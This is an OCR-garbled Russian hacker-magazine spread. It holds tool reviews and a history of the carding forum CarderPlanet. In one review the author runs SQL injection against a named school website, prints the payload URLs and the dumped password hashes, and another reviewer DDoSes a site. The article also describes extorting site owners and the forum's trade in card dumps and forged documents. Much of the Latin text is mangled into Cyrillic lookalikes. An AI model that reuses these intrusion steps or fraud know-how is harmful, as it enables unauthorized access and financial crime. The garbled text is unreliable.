денег. Правда, он нам потом отомстил, взломав 
наш сайт через этот же конструктор, только уже 
через другую багу. Но все закончилось хорошо. 

О ѵѵар.ѵѵер.ги — и снова конструктор 

ѵѵар.ѵѵер.ги (бывший ѵѵар.кѵЬик.ги ) — сайт, со- 
здавший свою популярность исключительно 
на рекламе. Его админ вкладывает все деньги, 
заработанные на продаже мобильного контента 
исключительно в рекламные аукционы и покуп- 
ку дорогих скриптов. Одним из таких скриптов 
снова является популярный в наше время конс- 
труктор вап-сайтов, расположенный у кубика по 
адресу: ѵѵхо.ги (глупый домен, не правда ли?). 
Здесь все было еще проще. Регистрируешь 
сайт, заходишь на страничку загрузки файлов и 
заливаешь файл іезІ.рИітІ, не прибегая ни к ка- 
ким ухищрениям с расширениями и т.п. Правда, 
здесь есть одно существенное «но». На серве- 
ре с конструктором очень грамотно настроен 
рНр, включен заіе тобе и сопутствующие ему 
настройки. Здесь пришлось применить мой 
скрипт, описанный в мартовском Хакере (статья 
«К кому уходят аси?», ИДр://ѵѵарр.гиАгазИ/6іг.1х1 ). 
позволяющий листать директории и просмат- 
ривать файлы без применения системных фун- 
кций. После небольшого изучения сервера мы 
слили все файлы конструктора себе и решили 
связаться с Кубиком. В итоге договорились о не- 
распространении скрипта за 1 0 дней рекламы у 
него на сайте. 

О Вместо заключения 

Надеюсь, ты понял, что баги в ѴѴАР-порталах бы- 
вают самые разные. К тому же большинство из 
них успешно мигрировало из ресурсов НТТР. Все 
ошибки, описанные в этом материале, актуальны 
до сих пор (если не на одном, так на другом ѴѴАР- 
ресурсе). Твоя задача — намотать это правило на 
ус и свыкнуться с мыслью, что взлом ѴѴАР ничем не 
сложнее всех остальных хакерских трюков, зс 
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Название: ВРѴ8 ѵі .3 
ОС: ОТІПСІОѴѴ8 2000/Х Р 
Автор: оѵегсіозе 




> Автоматизацию в массы! 

Большую часть времени в ходе взлома занимает 
непосредственно поиск уязвимостей. Поэтому 
частенько возникает желание автоматизировать 
данный процесс. Только представь: запускаешь 
специальный сканер, асам идешь пить кофе/пиво, 
дожидаясь появления лога. Мечты? Вовсе нет. 

Я хочу представить тебе замечательную софтину 
под названием Ветоіе РНР ѴиІпегаЬіІііу Зсаппег. 
Этот сканер предназначен для поиска уязвимос- 
тей в рИр-скриптах: отзрІ-іпіесІіопдоХЗЗ. 
Однажды я набрел на сайт одной из американских 



школ ( \А/\Алл/.ІзбЬ.к12.ІІ.из ). Не помню уже, чем меня 
заинтересовал этот ресурс, но мне захотелось 
протестировать на нем программу. Недолго думая, 
я запустил РРѴЗ и пошел спать. Проснувшись, я 
увидел лог, который показывал на скул-инъекцию 
скрипта зіогу.рбр в параметре Ыод_і<± Запустив 
браѵзер.янабралвадреснойстроке: \длд/ѵѵ.ІзбЬ.к12. 
ІІ.из/пеѵѵз/з1огѵ.рІір?Ыоа Іс1=109'&5ес1іоп=3іа1е . 
Через секунду передо мной предстало сообщение 
об ошибке запроса к МуЗОІ_-базе: 



Уои Гіаѵе ап еггог іп уоиг 50І_ зупіах; сНеск ІГіе тапиаі 1Гіаі| 
соггезропсіз Іо уоиг МуЗСХ зегѵег ѵегзіоп Ьг ІЬе гідЫ 5уп1ах| 

[о изе пеаг ^ ’ Д* ' 



Уязвимость действительно существовала. Я по- 
добрал количество полей. Их оказалось 4: 
ѵѵѵѵѵѵ.ІзбЬ.кІ 2.ІІ.из/пеѵѵз/з1огѵ.рИр?Ыоа ісІ=- 
1 %27+ипіоп+зеІесІ+1 .2.3.4/*&зес1юп=31а1е . 

А затем получил хэш рутового пароля к базе: 
ѵѵѵѵѵѵ.ІзбЬ.кІ 2.ІІ.из/пеѵѵз/з1огѵ.рІпр?Ыоа ісІ=-1 %27 
+ипіоп+зеІес1+1.2.раззѵѵогб.4+Ігот+тѵздІ.изег/ 
*&зесІіоп=Зіа1е . Сам хэш имел вид: ЗЗРЗЭ96СЗВС 
В50А5 В7 ЕА60 ВЗС46 Э0А990866544В . Кроме того, 
в таблице тузці.изег существовал еще один поль- 
зователь — пеѵѵзрадез. Хэш его пароля я извлек и 
также бережно сохранил: 404б961б7а4еа81 9. 
Конечно, ни один сканер не сделает за тебя всю 
работу. Но облегчить ее вполне под силам РРѴЗ, 
который доказал свою боеспособность. На диске 
ты найдешь не только саму программу, но и исход- 
ники к ней! Сразу хочу предупредить тебя: не взду- 
май менять заголовокформы на<Собеб Ьу Ѵазуа> 
или иную надпись. Уважай авторов, которые пода- 
рили миру этот замечательный сканер. 




Название: ІпіеІИТатрег 
ОС: ШіпсІоѵѵ8 98/ИТ/2000/ХР 
Автор: Ідог Коигтіпе 



> ІпіеІІіТатрег против экстремизма 

Ты наверняка слышал о сетевой борьбе против 
террористических ресурсов. Увы, но в наши 
дни террористы все чаще используют сеть для 
планирования своих операций и проведения 
агитаций. После событий в г. Нальчике осенью 
2005 года авторитетными людьми было приня- 
то решение о создании в андеграунде порта- 
ла реасе4реасе.сот. который бы послужил 
площадкой для организованных действий по 
устранению сайтов боевиков. Именно тогда я 
познакомился с софтиной ІпіеІІіТатрег. Этот 
сканер предназначен для определения веб-ди- 
ректорий и их содержимого. Ведь гораздо про- 
ще начинать активные действия, имея досто- 
верную информацию об атакуемом ресурсе. 
Основной целью нашей группы являлся сайт 
чеченских террористов каѵкагсепіег.сот . Дви- 
жок там стоял самописный, форум — ѵВиІІеііп 
последней версии, а сам сайт находился на 



/084 



ХАКЕР 08 /92/ 06 









выделенном сервере. Нужно было каким-то 
образом собрать данные о жертве. И тогда я 
вспомнил о ІпіеІІіТатрег, который, по словам 
одного из моих знакомых, отлично себя зареко- 
мендовал. Я запустил сканер, вбил 11В1_ сайта 
КавказЦентра и стал ждать. Через некоторое 
время ІпіеІІіТатрег показал отчет, в котором 
находился список веб-директорий с находя- 
щимися в них файлами. Среди прочих я обра- 
тил внимание на наличие админки новостного 
движка. На общее обозрение предоставляю 
кусок лога: 



РІЬЕ##епІгу.рІірРІІЕ##епІгу.рІір?асііоп=абб 

РОШЕП##/тесІіа/ 



ЕІ І_Е##_І псІех_сІеіаи Праде . Нт I 

ЕІ І_Е##_І псІех_сІеіаи Праде . Гііт I 
ЕОШЕН##/тесІіа/ти5ісДітиг/ 

ЕІ І_Е##_І псІех_сІеіаи Праде . Гііт I 
ЕІІ_Е##т_тосУаІіесІа. т рЗ 
ЕОШЕН##/тесІіа/тизісДітиг/т_тосІіаІпесІа.трЗ/ 



ЕОШЕРШ/сНаѴ 



РОШЕР##Догит/ітадез/ 
РОШЕРі##Догит/ 
ШШЩ1Дг/соп!епУ2005/04/1 5§ 



К сожалению, новостной движок оказался про- 
патченным. Поэтому сайт пришлось положить 
ДДоСом. Но в целом сканер показал отличный ре- 
зультат. Ведь довольно часто встречаются сайты 
с правами 777 на админскую диру или сді-Ьіп. По- 
этому, прежде чем приступать к поиску уязвимос- 
тей, не поленись запустить ІпіеІІіТатрег. Удачного 
сканирования! 

Название: Ытар4.1 1 
ОС: ѴѴіпсІоѵѵ$/*піх 
Автор: іпвесиге.огд 




> Мощь и сила ІЧтар 

Очередная версия одного из лучших сканеров 
портов. Скорее всего, ты уже пробовал рабо- 
тать с этой софтиной. И наверняка столкнулся 
с определенными трудностями. Во-первых, 
нужен сервер, на котором можно удаленно за- 
пускать ІЧтар, во-вторых, обилие параметров 
сканера вводит новичков в недоумение. Поэ- 



тому вместо общих слов о пользе программы я 
расскажу тебе о конкретных параметрах запус- 
ка сканера. Поехали: 

1 /-зТ (зсапТСР) — методТСРсоппесі(). Наиболее 
общий метод сканирования ТСР-портов. Функция 
соппесі(), присутствующая в любой ОС, позволяет 
создать соединение с любым портом удаленной 
машины. Для того чтобы использовать данный ме- 
тод, не нужно иметь специальных привилегий на 
сканирующем хосте. 

2 / -зЗ (зсап ЗѴІ\І) — сканирование скрытно от 
файрвола. В этом случае полное ТСР-соединение 
с портом сканируемой машины не устанавливает- 
ся. 

3/ -зР (зсап Ріпд) — сканирование с использова- 
нием ріпд-запросов. 

4 / -зѴ (зсап Ѵегзіоп) — режим определения вер- 
сий служб, за которыми закреплены сканируемые 
порты. Позволяет определять версии запущенных 
служб. Очень полезный параметр, особенно если 
ты имеешь гетоіе гооіехріоіі. 

5 / -зі <подставной_хост[:порт]> (зсап ІсІІе) — поз- 
воляет произвести невидимое сканирование пор- 
тов. То есть запросы передаются через подстав- 
ной хост, не посылая при этом пакеты жертве со 
своего ІР-адреса. Этот вариантудобен для опреде- 
ления политики доверия на уровне протокола ІР. 
в/ -зР (зсап РРС) — РРС-сканирование. Этот ме- 
тод используется совместно с другими методами 
сканирования и позволяетопределить программу, 
которая обслуживает РРС-порт, включая номер ее 
версии. 

7 / -з\А/ (зсап ѴѴіпбоѵѵ) — метод ТОР ѴѴіпбоѵѵ. Этот 
метод похож на АСК-сканирование, за исключени- 
ем того, что иногда с его помощью можно опреде- 
лять открытые порты точно также, как и фильтруе- 
мые/нефильтруемые. 

У/ -р <порт/диапазон> (рогіз) — опция сканиро- 
вания определенных портов или их диапазона. На- 
пример, <-р 21 > — сканирование 21-го порта. 

Э/ -о(Орегаііпд зузіет беіесііоп) — определение 
ОС на сканируемом хосте с помощью снятия отпе- 
чатков стека ТС Р/ІР. 

1 0/ -оІ\І <имя_файла> (оиіриі ІЧогтаІ) — опция 
логирования. Позволяет записать результат ска- 
нирования в файл. 

1 1 /-ѵ(ѵегЬозе оиіриі) — режим подробного отче- 
та. При использовании данного параметра ІЧтар 
будет оповещать о ходе каждого текущего дейс- 
твия. 

Я постарался осветить самые важные параметры 
сканера, но, на самом деле, их больше. Надеюсь, 
что после запуска ІЧтар у тебя появится непреодо- 
лимое желание разобраться с ним. 



Название: §НасІоѵѵ§сап 2.1 7 
ОС: ѴѴіпсІоѵѵз 98/МТ/2000/ХР 
Автор: ПесІ§ІіасІоѵѵ & МеІсо§оА 




> Семь сканеров в одном флаконе 

Хочу представить тебе обалденную тулзу 
ЗНабоѵѵЗсап. Это не просто сканер или оче- 
редной набор бесполезных утилит. Нет! Это 
набор действительно нужных и востребован- 
ных софтин. Но обо всем по порядку. Как-то 
я искал виндовый сканер, который включал 
бы в себя не только сканер портов, но и веб- 
сканер уязвимостей. Мой выбор остановился 
на ЗНабоѵѵЗсап. Помимо всевозможных ути- 
лит типа іеіпеі, пзіоокир, бпз іпТо, ѵѵНоіз, ріпд, 
пеізіаі, ііпдег, в программе присутствует сканер 
портов, ІЧеіВіоз-сканер, Ргоху-сканер, Ваппег- 
сканер, ІР-сканер. Кроме того, мое внимание 
привлекла опция генерирования продвинутых 
словарей для брута. Тебе достаточно указать 
используемые символы и длину пароля, после 
чего ЗНабоѵѵЗсап создаст словарик специаль- 
но для тебя. Также мне понравилась функция 
чекинга спам-листов. Я сразу загрузил не- 
большой спамерский лист на 50 тыс. адресов 
и отфильтровал порядка тысячи невалидных 

МЫЛЬНИКОВ. 

Но все же мне очень хотелось опробовать 
ЗНабоѵѵЗсап в боевых условиях. Я выбрал один 
из потенциально бажных серверов и запустил 
ЗііеІпТо. И ЗИабоѵѵЗсап не подвел: 

Еір Зегѵег: РгоЕТРй 1 .2.9 

НТТР Зегѵег: АрасЬе/1.2.29 (ІЧпіх) тосІ_ІсІар_ 

изегсІіг/2.8.16 0реп55І_/ 

ЗМТР Зегѵег: ЗепсІтаіІ 8.11.6 

Как видно, на сервере крутилась бажная вер- 
сия зепбтаіі. На руках у меня находился гетоіе 
гооі ехріоіі под зепбтаіі <= 8.12.8, что не могло 
не радовать. Я закрыл сканер и занялся сер- 
вером. Рекомендую обязательно установить 
ЗНабоѵѵЗсап. Эта программа тебе еще не раз 
пригодится. В общем, Мизі Наѵе! нс 
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лане 



ЗОЛОТОЕ ВРЕМЯ САРЮЕКРЦШЕТ 



МШРѴѴ 



сарюек Р щ А1ч , ет 



ВПЕРВЫЕ О САЙТЕ САВОЕВРЕАЫЕТ Я УЗНАЛ ГДЕ-ТО В 2002 ГОДУ. ПРЕКРАСНО ПОМНЮ, КАКОЕ ВПЕЧАТЛЕНИЕ ОН НА МЕНЯ 
ПРОИЗВЕЛ. НАВЕРНОЕ, ТЕ ЖЕ ЧУВСТВА ИСПЫТЫВАЛ АЛИ БАБА, КОГДА ОБНАРУЖИЛ ПЕЩЕРУ, ДОВЕРХУ ЗАПОЛНЕННУЮ 
СОКРОВИЩАМИ. КАЖДЫЙ РАЗДЕЛ СОДЕРЖАЛ КУЧУ ИНФОРМАЦИИ О ТОМ, КАК МОЖНО РАЗБОГАТЕТЬ. НЕПОНЯТНЫЕ 
ТЕРМИНЫ, ТАКИЕ КАК ДАМПЫ, ДРОПЫ, ВАЕРЫ, КРЕДЫ, ВДОХНОВЛЯЛИ НА ИЗУЧЕНИЕ ЭТОЙ МУДРЕНОЙ НАУКИ. СОБЛАЗН 
БЫЛ СЛИШКОМ ВЕЛИК, ОСОБЕННО ДЛЯ ПРОВИНЦИАЛЬНОГО ПАРЕНЬКА, КОТОРЫЙ ЛЕГАЛЬНО В СВОЕМ ГОРОДЕ МОГ ЗА- 
РАБАТЫВАТЬ НЕ БОЛЬШЕ $100 В МЕСЯЦ. ПОМНЮ, КАК МЫ С ДРУГОМ ОБСУЖДАЛИ ОТКРЫВШИЕСЯ ГОРИЗОНТЫ, МЕЧТАЛИ 
О МИЛЛИОНАХ. НО ОБСТОЯТЕЛЬСТВА СЛОЖИЛИСЬ ИНАЧЕ. ПОЯВИЛИСЬ НОВЫЕ УВЛЕЧЕНИЯ — И ПОСТЕПЕННО Я ЗАБЫЛ 



О «ПЛАНЕТЕ». 



□ РОЖДЕНИЕ «ПЛАНЕТЫ» 




Историю сагсіегріапѳі можно начать с 1990 
года — времени, когда в России и странах СНГ 
впервые стало зарождаться такое понятие, 
как кардинг. Буржуйские магазины в то время 
только начинали экспериментировать с опла- 
той услуг по кредитным картам, и защита была 
на самом элементарном уровне. Можно было 
сгенерировать номер кредитки, вбить его в 
специальную графу — и через пару недель по 
почте приходил заказанный товар. Правда, за- 
нимались фраудом немногие — информация 
была закрытой, а программы-генераторы но- 




меров хранились в привате. 

К середине 90-х тема со сгенерированными 
кредами накрылась, и из-за того, что русский 
народ слишком уж злоупотреблял их исполь- 
зованием, Америкаблокировалаотправкулю- 
бых товаров в нашу страну. Тогда на помощь 
пришли хакеры, которые взламывали защиту 
е-шопов и систем электронных переводов и 
собирали данные о кредитках их клиентов. 
Все это добро передавалось кардерам, кото- 
рые по своим каналам обналичивали деньги. 
После того как информация просочилась в 
прессу, и журналисты рассказали миру о но- 



вом явлении, возможность быстро обогатить- 
ся привлекла толпы студентов. Большинство 
американских магазинов еще не имели опыта 
общения с кардерами, поэтому развести их и 
снять товар с помощью дропов не представ- 
ляло большого труда даже для новичков. Пад- 
кий до халявы народ заказывал часто, много 
и все подряд. 

В 1 997 году в кардерском сообществе форми- 
руется своего рода иерархия, где отдельные 
личности и группы выделяются на фоне ос- 
тальных как по уровню, таки по масштабу дел. 
Появляется такое понятие, как «семья» , струк- 
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тура и титулы которой были позаимствованы кардерами у 
мафиозныхкланов.В«семью» входили люди, доверяющие 
друг другу полностью. Не хватало только приличного мес- 
та для общения и обмена опытом. Конечно, был сагсіег.ога 
— один из первых кардерских сайтов, — но полезной инфы 
на нем было мало, да и работал он нестабильно. В конце 
концов русские кардеры решили основать собственный 
ресурс на русском языке. Так появился ѵѵѵѵѵѵ. 
сагсіег.ги . отцом которого был уже небезызвест- 
ный в то время ЗсгірГ Благодаря пиару в журнале 
«Хакер» сайт быстро завоевал популярность. 

Зсгірі хотел создать лучший сайт о кардерстве, 
и на некоторое время ему это удалось. Но через 
полгода известность этого места вышла за пределы анде- 
граунда, и админу посыпались требования со всего мира 
прикрыть лавочку, что в итоге привело к остановке работы 
сагсіег.ги . 

Энтузиазм ЗсгірГа поутих, хотя и ненадолго. Благодаря 
поддержке друзей он решил возродить сагсіег.ги . но в но- 
вом обличии. Для этого был куплен домен сагсіегріапеі.сот . 
на котором админы не изменили стилю предшественника 
и запустили новый форум, собравший вскоре всю элиту 
кардерского мира. 



О СЕРВИСЫ 

Первые годы «планеты», как прозвали сагсіегріапеі посто- 
янные посетители, можно назвать «золотым временем». 
На форуме практически не было ламеров, все обсуждали 
новые возможности кардинга, делились друге другом опы- 
том и открытиями. Те, кто размещал в свободный доступ 
полезные статьи, быстро завоевывали авторитет, их авто- 
рам присваивались почетные звания. 

Несмотря на наличие «семьи» и отдельных групп, кардеры 
всегда были волками-одиночками. Работая в таком «бизне- 
се», опасно иметь близких друзей — приходится рассчиты- 
вать только на себя. Но вместе с тем, независимо от того, 
занимаешься ты сетевым кардингом или реальным пласти- 
ком, невозможно знать и уметь все. Приходится пользовать- 
ся услугами других людей. И поскольку спрос на разные ус- 
луги среди читателей «планеты» был большой, на форуме 
быстро открылись разного рода сервисы. 

Одним из самых популярных был Гарант-сервис. Систе- 
ма его работы была проста: при совершении сделок, как 
товар, так и деньги, проходили через третью сторону, в 
порядочности которой никто не сомневался. Гарант-сер- 
вис проверял соблюдение всех условий сделки и за свои 
услуги брал 10% комиссионных. Правда, имелись кое-ка- 
кие ограничения: сервис работал только с виртуальным 
товаром, а размер суммы граничил в пределах $5-500 (для 
более крупных сделок существовал отдельный Гарант- 
сервис от некоего 2епо). 

Также очень популярными в свое время были услуги Воа 
Расіогу. Боа был одним из приближенных к «семье», но 
для рекламирования услуг использовал не форум, а собс- 
твенный сайт: ѵѵѵѵѵѵ. Ьоаіасіогѵ.пеГ При заходе на индекс- 
ную страничку сразу бросались в глаза соблазнительные 
предложения типа: «Хочешь сделать себе российское 
гражданство за 3 дня? Нет проблем», «Нужен диплом об 
окончании престижного вуза? Запросто», «Сертификаты, 
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> С 2000 по 2004 год сайт 
сагсіегріапеі был цент- 
ральным местом общения 
русского компьютерного 
андеграунда. Здесь оби- 
тали не только кардеры, 
но и серьезные хакеры, 
вирусмейкеры, спамеры 
и другие представите- 
ли фрауда. Сайт был 
настоящей мозолью для 
всевозможных спецслужб, 
так как долгое время его 
никто не мог закрыть. Сей- 
час «планета» существует 
только в архивах и памяти 
тех, для кого она когда-то 
была вторым домом. 



Деньги всегда 
были отличным 



стимулом 
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свидетельства, визы, водительские права? 
Ты попал куда нужно, приятель». Боа факто- 
ри предлагала подделку практически любых 
документов. Причем отличить фальшивку от 
подлинника было практически невозможно. 
Контора даже проставляла штампы о въезде и 
выезде из нейтральных стран, чтобы паспорт 
не выглядел новым. Узнать, что паспорт подде- 
льный, можно было только после тщательной 
проверки номера. Стоимость услуг зависела 
только от сложности дела: например, цена 
на русский паспорт была в районе $400, а на 
паспорт гражданина Ирландии доходила до 25 
тысяч долларов. 

Помимо подделки документов, Воа Расіогу за- 
нималась тем, что продавала дампы кредит- 
ных карт, оборудование для работы с реаль- 
ным пластиком, готовые «голые» кредитки с 
голограммой и полосой подписи. Благодаря 
сравнительно невысоким ценам и профес- 
сионализму эта контора считалась лучшей в 
своем роде, и ее услугами пользовались ты- 
сячи людей. Но история Воа Расіогу подошла 
к концу с арестом самого Боа (реальное имя 
— Роман Вега) на Кипре летом 2004 года. На 
«планете» эта новость наделала много шуму, 
и люди, которые на громком имени решили 
срубить денежек, не заставили себя долго 
ждать. Как на форумах, так и в мыльницах, 
появилась куча спама с предложением услуг 
о переклейке паспортов и т.д. Объединяли 
их две вещи: наличие магических слов «Воа 
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Расіогу» в строке адреса и то, что за всем этим 
стояли обычные рипперы (кидалы). 

Конечно, сервисы «планеты» не ограничива- 
лись Г арантом и услугами Боа. Были сервисы 
по продаже различной информации (кредит- 
ные карты, раураі и е-Ьау акки, банковские акки 
и т.д.), по обеспечению безопасности (ѴРІЧ, 
соксы и прокси), по рассылке спама, по про- 
ведению ООоЗ-атак 
на вражеский сайт. 

Периодически народ 
делился разными 
вкусностями (6-знач- 
ные аськи, хостинг 
или акки на фтп) бес- 
платно. «Планета» 
давала кардерам все 
необходимое:инфор- 
мацию, инструменты, 
услуги. Неудивитель- 
но, что для многих из 
них она стала вторым 
домом 

О ВРЕМЯ 
ПЕРЕМЕН 

В 2004 году 
Бсгірізаявил 
об уходе. 

Возможно, 
основной 
причиной 



послужило то, что имя Скрипта стало слиш- 
ком известным, и спецслужбы все больше 
обращали внимание на деятельность карде- 
ров, периодически совершая аресты «особо 
зарвавшихся юнцов». Сайт в одночасье ли- 
шился двух руководителей, которые стояли у 
самых истоков (вторым был Боа). Произош- 
ла смена администрации, и вместе с тем, по 









ПЛАНЕТА СС 







мнению многих участников, стала меняться 
атмосфера. Из приватного форума, на кото- 
ром общались все «свои», сагсіегріапеі пре- 
вратился в место наподобие базара, куда 
заходили все кому не лень (количество за- 
регистрированных юзеров превысило 7000). 
Появилось много ламеров, а вместе с ними 
«планету» захлестнула волна кидал, которые 
на этих самых ламерах пытались нажиться. 
Способов кидания было много, на форуме 
даже опубликовали несколько аналитических 
статей о том, какие бывают рипперы и как от 
них защититься. Чаще всего просто предла- 
гали какие-то вещи, а после перевода денег 
не выполняли своих обязательств. Более ма- 
терые кидалы втирались в доверие форумчан, 
некоторое время честно исполняя заказы и 
собирая положительные отзывы. А в процес- 
се особо крупной сделки исчезали 
с деньгами. Остановить рипперов 
не могли ни черные списки, ни даже 
физические расправы (было, как ми- 
нимум, несколько таких случаев). 

Когда ситуация стала неуправляемой, адми- 
нистрация решила пойти на крайние меры: 
сделать регистрацию на форуме платной. 
Была даже идея сделать «планету» закрытой 
для посторонних, но народ ее не поддержал. 
Тем не менее, платная регистрация отсеяла 
часть ламеров и кидал, хоть и не искоренила 
явление полностью. 

О ПОСЛЕДНИЕ ДНИ 

Пост админа форума Кіпд_АгФиг’а, датиро- 
ванный 28 июля 2004 года, стал для завсегда- 
таев «планеты» настоящим ударом. «Доброго 
времени суток, уважаемые и, в некотором 
смысле, родные форумчане. Итак, пора вам 
сообщить одну не самую добрую весть: фо- 



рум пора закрывать...». Для многих этот сайт 
уже давно стал необходимым инструментов 
в работе, без которого они не представляли, 
что делать. Мало кто мог с этим смириться, на- 
род наперебой стал предлагать способы, как 
спасти форум. Некоторые предлагали деньги. 
Но причину Король Артур указал совершенно 
ясно: «планета» была под колпаком всевозмож- 
ных спецслужб, как русских, так и зарубежных, и 
продолжать работать было слишком опасно. 
«Работники ФБР ходят в компанию АОІ_, как к 
себе домой, беря оттуда логи от ісц и распе- 
чатку из хистори, сотрудники ФСБ предлага- 
ют деньги хостинг-компаниям за логи этого 
форума. Какими бы мы все умными ни были, 
сколько прокси и соксов мы бы ни юзали, в ка- 
ком бы темном уголке земли ни располагался 
ВПН, через который мы ходим, — все мы люди 
и всем нам присущ человечес- 
кий фактор. Мы прекрасно по- 
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зарегистрированный пользова- 
тель. 

член семьи. 

друг семьи и «правая рука» 

Крестного отца. 

верховный судья. Г лава службы 

безопасности. 

советник семьи по 
различным важным вопросам. 

— мемберы, на которых возложена 
миссия защиты и помощи семье. 

надежные люди, к которым присматри- 
вается администрация, либо люди, не участвую- 
щие в жизни форума. 

модератор форума, 
человек, сервис которого 
прошел проверку администрации. 

бывший геѵѵіеѵесі ѵепсіог, 
уличенный в предоставлении некачественных 
услуг. Если через 14 дней проблемы с клиента- 
ми не решались — титул переходил в Ріррег. 
кидала. 

отброс общества. Чаще все- 
го присваивался за оскорбление модераторов 
или мемберов. 

человек, постящий одинаковые объ- 
явления в разные разделы, задающий тупые 
вопросы, мешающий общению мемберов. 

— ' 



нимаем, что многие потеряют работу, многие 
просто не смогут больше зайти и пообщаться с 
единомышленниками, но, к сожалению, мы не 
собираемся подставлять свой зад для чьих-то 
заработков». 

Форум просуществовал еще2 недели . Это время 
посетители использовали, чтобы попрощатьсяс 
«планетой» и друге другом, обменяться контак- 
тами, обсудить будущее, поделиться некоторы- 
ми вещами, которые раньше держали в привате. 
А потом для кардеров настали не лучшие дни. 
Кто-то полностью оставил этот промысел, кто- 
то перешел на другие форумы, которые каза- 
лись лишь бледной копией старой «планеты». 
Царившее среди кардеров настроение хорошо 
описывает небольшой стих, сочиненный одним 
из старых мемберов сайта: «Щемит в душе тос- 
ка, и темный конопляный дым въедается в глаза, 
как будто слезы пытаясь выжать. Я помню, как 
всегда, заходив сюда и видя черно-синий цвет, я 
заново будто рождался » . 

Для некоторых история закончилась еще 
печальнее, так как, несмотря на закрытие 
сагбегріапеі, спецслужбы не свернули свою ра- 
боту. Следовательский механизм был запущен, 
и в последующие три года на скамье подсуди- 
мых оказались многие из тех, кто имел отноше- 
ние к «планете». 
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□ АРЕСТЫ 

Весной 2005 года полиция Великобритании 
совместно с ФБР, американской почтовой служ- 
бой и министерством финансов США провели 
расследование ряда электронных грабежей на 
территории Европы и Америки. Результатом 
этой операции стала поимка двух кардеров: 
Далласа Дугласа Хэварда и Ли Эдвуда, при- 
частных к «семье» и, по мнению полиции, 
успевших украсть почти 12 миллионов дол- 
ларов. Поскольку улик против них набралось 
немало, оба во всем сознались и согласились 
дать показания против остальных участни- 
ков «планеты». Вероятно, не без помощи их 
инфы, 7 июля украинским властям удалось 
провести один из самых громких в истории 
компьютерного андеграунда арестов — арест 
самого Зсгірі’а. 

На самом деле Дмитрий (реальное имя Скрип- 
та) уже год находился в международном ро- 
зыске и в момент задержания жил в Одессе у 
своей бабушки. В ход операции были посвя- 
щены лишь несколько следователей из МВД, 
так как милиция опасалась, что их сотрудники 
позарятся на деньги кардера и сообщат ему 
обо всем заранее. 

МатериаловподелуоснователяСагсІегрІапеі 
набралось на пару десятков увесистых то- 
мов. Все были уверены, что Зсгірі’а на этот 
раз прижали основательно, и парню придет- 
ся сидеть, как минимум, лет 10. Но надежды 
следователей не оправдались. На судебном 
процессе объявились поручители Дмитрия 
из правительственных кругов (народные де- 
путаты) и прокомментировали свою подде- 
ржку тем, что Скрипт — талантливый парень, 
будущее страны и негоже его гробить в тю- 
ряге. К тому же прокурор сообщил, что не 
собирается перечитывать все 20 с лишним 
томов дела — мол, нет времени. Окончание 
процесса стало ясно заранее — Скрипта 
отпустили с условием невыезда из страны. 
А по поводу набранных улик адвокат карде- 
ра дал комментарий в феврале 2006 года: 
«Дело было сфабриковано милицией по за- 
казу платежных систем». 

Статей об аресте и суде над отцом «планеты» 
в интернете и печатной прессе проходило не- 
мало. Журналисты были возмущены таким от- 
кровенным спектаклем, и вовсю критиковали 
депутатов. В то же время в кардерском сооб- 



ществе все искренне радовались за Скрипта. 
Так как многие именно благодаря ему заня- 
лись «бизнесом» и заработали свой, пусть и 
не самый чистый, но капитал. 

□ ИНТЕРВЬЮ 

В конце этой статьи мне хотелось 
дать интервью с одним из членов семьи 
Сагбегріапеі, но люди, с которыми я связывал- 
ся, не захотели разговаривать даже под вы- 
мышленным именем. Постоянные участники 
форума тоже не спешили откровенничать, но 
один из завсегдатаев (назовем его Жора) все- 
таки согласился ответить на пару вопросов. 
тіпгіѵОгк: Как ты попал на «планету», как 
влился в коллектив и что получил от своего 
пребывания там? 

Ж: Меня как-то заинтересовала безопасность 
одного онлайнового шопа, и после некоторых 
экспериментов с ним на руках оказалась не- 
плохая база кредиток. Конечно же, захоте- 
лось извлечь из этого выгоду, начал искать в 
сети инфу. Так я и попал на «планету». 
гпіпсІѵОгк: Какие были основные этапы жиз- 
ни сагбегріапеі? С самого начала и до самого 
закрытия. 



Ж: Жизнь форума была стабильна до ухода 
Скрипта в реальный бизнес (хотя, как позже 
стало ясно, это было не совсем так). Затем 
произошла смена администрации и через не- 
которое время закрытие «планеты». 
тіпсІѵѵОгк: Какими привилегиями пользовались 
Саро сіі Сарі и как человек из простого пользо- 
вателя мог стать приближенным к семье? 

Ж: Члены семьи (всего их было человек 10) 
пользовались всеобщим доверием и уваже- 
нием. А стать ее членом можно было, только 
работая с ней, и, в частности, со Скриптом. 
тіпсІѵОгк: Расскажи о широко известных лю- 
дях с «планеты». 

Ж:Намойвзгляд,самымиизвестнымибылиВоа 
и Зсгірі. Боа поставил на поток производство 
реального пластика и поддельных докумен- 
тов. А Скрипт снабжал народ неплохими дам- 
пами. Арест Боа для многих был шоком. Когда 
Скрипт уходил из кардинга, в официальном 
топике на «планете» говорилось, что он ос- 
тавляет кардинг и уходит в реальный бизнес, 
открывает, вроде, шиномонтаж. Наверное, 
почуял что-то неладное и решил вовремя уйти 
со Сцены, но, к сожалению, было уже поздно. 
Впоследствии многие сетевые ресурсы пи- 
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сали об аресте Скрипта, и его реальное имя 
фигурировало повсюду (одно время по рукам 
ходил скан его паспорта). Я очень благодарен 
Скрипту зато, что он создал «планету» такой, 
какая она была, и искренне сожалею о том, что 
с ним произошло. 

ппіпгіѵОгк: Насколько велики были доходы 
профессиональных кардеров? Я слышал, что 
многие из таких людей, имея миллионы, ходи- 
ли в дырявых джинсах и никак не показывали 
свой достаток. Так ли это? 

Ж: Имея миллионы, тяжело не показывать 
свои доходы. Многие пытались легализовать 
их, открывая бизнес в реале. А про таких под- 
польных миллионеров, ходящих в рваных 
джинсах, я не слышал. 

ппіпгіѵОгк: Какими знаниями и оборудованием 
нужно было обладать, чтобы успешно зани- 
маться кардингом? 

Ж: Оборудование здесь не главное, главное 
— знания. Хотя без оборудования ты никуда 
не денешься, если решил заняться реальным 
пластиком. Чтобы все дела шли гладко, надо 



хорошо разбираться в той теме, которой ты 
занимаешься, знать все тонкости и подвод- 
ные камни. 

ппіпгіѵОгк: Какие компании/сайты больше 
всего страдали от деятельности русских 
кардеров? Насколько отличаются те цифры, 
которые фигурировали в отчетах спецслужб 
о нанесенных кардерами убытках, от насто- 
ящих? 

Ж: Вечнымижертвами был и и будуте-Ьау, раураі , 
ѵѵезіегп ипіоп, а также различные платежные 
системы, биллинги и банки, особенно те, кото- 
рые предлагают услуги онлайн-банкинга. Ни 
одна компания не осмелится назвать реальную 
цифру убытков, причиненных кардерами, ведь 
таким образом она покажет несовершенство 
